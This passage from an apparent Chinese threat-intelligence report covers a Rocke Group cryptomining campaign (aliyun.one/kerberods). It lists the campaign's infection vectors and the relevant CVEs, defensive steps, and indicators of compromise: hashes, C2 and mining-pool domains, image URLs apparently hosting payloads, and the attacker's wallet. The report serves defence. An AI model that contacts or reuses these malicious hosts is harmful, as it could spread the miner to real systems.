systemten.org在之前已经被指出为kerberods挖矿病毒,通过对kerberods的感染方式,权限维持等方式进行对比,可以确认本次的aliyun.one与kerberods挖矿家族为同一个团体在运营。该团队在之前被Unit42团队披露为Rocke Group黑产团伙。
0x3 感染方式
1、ssh弱口令爆破
2、ssh免密登录
3、redis未授权访问漏洞
4、redis弱口令爆破
5、Jenkins弱口令爆破
6、Jenkins远程代码执行漏洞(CVE-2018-1000861、CVE-2019-1003000)
7、ActiveMQ任意文件写入漏洞(CVE-2016-3088)
0x4 防护
1、更改密码为强密码,密码每个机器不同
2、ssh免密登录要严格控制机器
3、加强redis防护,开启redis的密码验证,且密码更换未强密码
4、检测是否存在Jenkins弱密码,修改密码未强密码
5、检测是否存在jenkins远程代码执行漏洞并进行修复
6、检测是否存在ActiveMQ任意文件写漏洞。
7、检测是否存在Confluence未授权访问漏洞(CVE-2019-3396)
0x5 IOC
F81137FF4ED563101B3ACB8185CF16D5AF89C9E5
52AA4166F256495250C9191670DB258794059277
update.iap5u1rbety6vifaxsi9vovnc9jjay2l.com
x64.iap5u1rbety6vifaxsi9vovnc9jjay2l.com
cron.iap5u1rbety6vifaxsi9vovnc9jjay2l.com
aliyun.one
pool.supportxmr.com
sg.minexmr.com
iap5u1rbety6vifaxsi9vovnc9jjay2l.com
img.sobot.com/chatres/89/msg/20191225/1/ec0991da601e45c4b0bb6178da5f0cc4.png
img.sobot.com/chatres/89/msg/20191225/1/50659157a100466a88fed550423a38ee.png
cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269944760/2.637890910155951.png
cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269966297/8.872362655092918.png
https://user-images.githubusercontent.com/56861392/71443284-08acf200-2745-11ea-8ef3-509d9072d970.png
https://user-images.githubusercontent.com/56861392/71443285-08acf200-2745-11ea-96c3-0c2be9135085.png
0x6
钱包地址
48tKyhLzJvmfpaZjeEh2rmWSxbFqg7jNzPvQbLgueAc6avfKVrJFnyAMBuTn9ZeG4A3Gfww512YNZB9Tvaf52aVbPHpJFXT
0x7 Ref
https://v2ex.com/t/624351
https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities--exploits--and-malware-driving-attack-campaigns-in-december-2019
https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/
https://unit42.paloaltonetworks.com/rockein-the-netflow/